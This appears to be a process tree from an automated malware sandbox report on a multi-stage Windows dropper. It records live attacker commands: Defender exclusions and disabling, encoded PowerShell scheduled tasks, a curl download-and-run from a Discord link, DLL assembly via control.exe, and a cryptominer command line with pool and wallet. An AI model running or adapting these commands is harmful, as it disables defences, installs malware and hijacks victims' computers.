C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri1034cd265b5e0adcd.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri1034cd265b5e0adcd.exe" ) do taskkill -F -Im "%~nXU"7⤵
-
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXeSkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"11⤵
-
C:\Windows\SysWOW64\control.execontrol .\FUEj5.QM11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM12⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM14⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -Im "Fri1034cd265b5e0adcd.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10b0a06a73706.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri10b0a06a73706.exeFri10b0a06a73706.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\8866579.scr"C:\Users\Admin\AppData\Roaming\8866579.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\2402267.scr"C:\Users\Admin\AppData\Roaming\2402267.scr" /S6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\2768772.scr"C:\Users\Admin\AppData\Roaming\2768772.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\1294868.scr"C:\Users\Admin\AppData\Roaming\1294868.scr" /S6⤵
-
C:\Users\Admin\AppData\Roaming\4697381.scr"C:\Users\Admin\AppData\Roaming\4697381.scr" /S6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10584c049c7f.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri10584c049c7f.exeFri10584c049c7f.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\uHQTVMa71BpO6ahOUBeXGh7S.exe"C:\Users\Admin\Documents\uHQTVMa71BpO6ahOUBeXGh7S.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\Z0vWFXUapMHmh_phsDBKsg6d.exe"C:\Users\Admin\Documents\Z0vWFXUapMHmh_phsDBKsg6d.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 17327⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\uFV1qYteW8OniKJlNEeZ9vlH.exe"C:\Users\Admin\Documents\uFV1qYteW8OniKJlNEeZ9vlH.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\uFV1qYteW8OniKJlNEeZ9vlH.exe"C:\Users\Admin\Documents\uFV1qYteW8OniKJlNEeZ9vlH.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\XAfzJJSyjz6aLSN1D1ltSV2W.exe"C:\Users\Admin\Documents\XAfzJJSyjz6aLSN1D1ltSV2W.exe"6⤵
-
C:\Users\Admin\Documents\YkljOGa70o6I1XC7Gy3rDqXc.exe"C:\Users\Admin\Documents\YkljOGa70o6I1XC7Gy3rDqXc.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 2967⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\lh2ZWaoIYwT9AEZddJ89Fx_y.exe"C:\Users\Admin\Documents\lh2ZWaoIYwT9AEZddJ89Fx_y.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exeC:\Users\Admin\AppData\Roaming\RuntimeBroker.exe7⤵
- Executes dropped EXE
- Drops startup file
-
C:\Users\Admin\AppData\Local\Temp\Launcher.exeC:\Users\Admin\AppData\Local\Temp\Launcher.exe7⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Launcher.exe"8⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit9⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"10⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"10⤵
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"10⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services64.exe"9⤵
-
C:\Windows\system32\services64.exeC:\Windows\system32\services64.exe10⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Windows\system32\services64.exe"11⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit12⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"13⤵
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"12⤵
-
C:\Windows\System32\conhost.exeC:\Windows/System32\conhost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14444 --user=41zSmpNwAfHBxUh8HTq7Fsj2TXsGboB8GFeM8ek7xhc8QmL1TJCmoam94f57niQhKqiajN7KMWmAng1cNnMghXPi5bN3xNk.{COMPUTERNAME}/adwadw --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56GQTOYuXRCBeyb5NYlmdCuiwuvmEFRE3FUoytGa2xDRKVyTGVqBRZ3YvrseaWnYy0OhLuczKVxfo8Wo33kvDh26CIpmy6+bf50YCXxhpkDvay12RqWFwTrEWzJDjMOFSbV4qSudJZDKeejGmt2wAsK4zZ9lj0F0NMeagNs9oiluuddfhHuwfN3JDOsm7vnmpSFDvtwzZIXsZWyWN624JxJsSIqBQxfKrcCnHvRx/k2yLSlvxLvum+3cwztr7Zb0wO7EEWrafJMkNolCTGr1RQK9klv+u1q+LOMUOW+Y1mA+ZjeC+aSi9qmt59ZMlAX42foDzL1w8qyVjl6rfhEF/2bTP0YCyKockkTlSVngGY/1F1T5EOo9DhmrxyNy9y8mJqRKYUIcpgNI5Y4F/BBh3W0pw0+6w6pKB/o2s/ADQ0m7f1mIWwiXrj/GHg6M2kw4tg4mnBGVnha642JDqV8iaYphm4FpsNVwyEeLSXd18Mjr+kd9fvE08ohpB15bbg+6JPSeWISk8CHiep3TzEvyvZ+5XcHZVh1iXXZwlYO+wW5wxnobnzBzuj6f/BZ2txWK+7m4Cgd8mjMym7jJ/vKH1WIDSz05jpx4+wkdqzn3YIdvl2S8Luc4rG0CJXqJOdwbYOBrAey4VzJk8E8cY9tmMr5hpjLcfmu59CVDYVbbFFkb9usjHhXda167RDDOeCiLgdiepY0+9J4GWfDFBWRnvZEIn9njCW10s1hFXvQH+unnKdsaoBPNxSaPInK8O97Hj64jPqNG5qPd3DSjbVR1Cvuh9P29ZftnsNS50GnGtYvaNRBa6443D9MamN7WKSEjXwi5X466GHpLm7tClAm3T8zHW8BSKHq3yutkuduzGC2BYW5rxa17LYp4CzfKufpZJNPcoGIEVeut/xrvPPi+IYNCKrJPaDMN2ZJkpVGMqbuc5AF89xn8L6Lg1pYhaW8QjVZfQAkz7FVC8K667Gg6noLQpAyfd6lW36v4zbzg+fy82rNQmYSI3WMfiYNmvJM8DVc0772kBqEwUisr6ktdw4QlqXJe45Hvgu4yC2Rb6/ntnmOTLJz66c2h/wdUSvS18C67j6jsTvSh7k7avmCdG4sgS/BcyNsYOGIVjgNICoikSjNVrnFxCscaJerBnNPv197mrO4+rRF20+jzVnXKaNAmzbmoa4UjU13WSWasSDIT/lwH5kWp3uPfR1kinOL+sIQ==" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth12⤵
-
C:\Users\Admin\AppData\Local\Temp\Java.exeC:\Users\Admin\AppData\Local\Temp\Java.exe7⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Java.exe"8⤵
- Drops file in System32 directory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit9⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"10⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"10⤵
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"10⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services32.exe"9⤵
-
C:\Windows\system32\services32.exeC:\Windows\system32\services32.exe10⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Windows\system32\services32.exe"11⤵
- Drops file in System32 directory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit12⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Checks processor information in registry
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"13⤵
-
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"12⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "/sihost32"13⤵
-
C:\Users\Admin\Documents\hfNfszaiVyu9terbhxabjMWT.exe"C:\Users\Admin\Documents\hfNfszaiVyu9terbhxabjMWT.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\hfNfszaiVyu9terbhxabjMWT.exe"C:\Users\Admin\Documents\hfNfszaiVyu9terbhxabjMWT.exe"7⤵
-
C:\Users\Admin\Documents\hfNfszaiVyu9terbhxabjMWT.exe"C:\Users\Admin\Documents\hfNfszaiVyu9terbhxabjMWT.exe"7⤵
-
C:\Users\Admin\Documents\hfNfszaiVyu9terbhxabjMWT.exe"C:\Users\Admin\Documents\hfNfszaiVyu9terbhxabjMWT.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4992 -s 10487⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\N0VjIjlb_wrY4X36qFb0KkVc.exe"C:\Users\Admin\Documents\N0VjIjlb_wrY4X36qFb0KkVc.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C c: && cd %tmp% && curl -O https://cdn.discordapp.com/attachments/864075800058789891/892369397816111135/Windows_Host.exe && start "" Windows_Host.exe7⤵
-
C:\Windows\SysWOW64\curl.execurl -O https://cdn.discordapp.com/attachments/864075800058789891/892369397816111135/Windows_Host.exe8⤵
-
C:\Users\Admin\Documents\_iwthQKn9nAdj0T28Lw5n5HS.exe"C:\Users\Admin\Documents\_iwthQKn9nAdj0T28Lw5n5HS.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\4256270.scr"C:\Users\Admin\AppData\Roaming\4256270.scr" /S7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\2118840.scr"C:\Users\Admin\AppData\Roaming\2118840.scr" /S7⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\5478727.scr"C:\Users\Admin\AppData\Roaming\5478727.scr" /S7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\2897423.scr"C:\Users\Admin\AppData\Roaming\2897423.scr" /S7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\6160157.scr"C:\Users\Admin\AppData\Roaming\6160157.scr" /S7⤵
-
C:\Users\Admin\Documents\Eow9sch3bUzf_WXXvx7RU2Yr.exe"C:\Users\Admin\Documents\Eow9sch3bUzf_WXXvx7RU2Yr.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5972 -s 2767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\llJVCyoEgJxuaB4XO_SNJcmN.exe"C:\Users\Admin\Documents\llJVCyoEgJxuaB4XO_SNJcmN.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS685A.tmp\Install.exe.\Install.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS77EA.tmp\Install.exe.\Install.exe /S /site_id "394347"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Enumerates connected drives
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &9⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True11⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C EChO | Set /p = "MZ" > XAJ5SctM.IMN © /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX+ KPeo.Pvp + _OTV19C.~ +EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I&StArT control.exe ..\QVNGP.I &del /Q *12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>XAJ5SctM.IMN"13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "13⤵
-
C:\Windows\SysWOW64\control.execontrol.exe ..\QVNGP.I13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\QVNGP.I14⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\QVNGP.I15⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\QVNGP.I16⤵
- Loads dropped DLL
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gtoMBhQwp" /SC once /ST 04:52:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 11:13:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\zJgrlXQ.exe\" uG /site_id 394347 /S" /V1 /F9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\vRimKORg6sXDoijekzeZQRUR.exe"C:\Users\Admin\Documents\vRimKORg6sXDoijekzeZQRUR.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
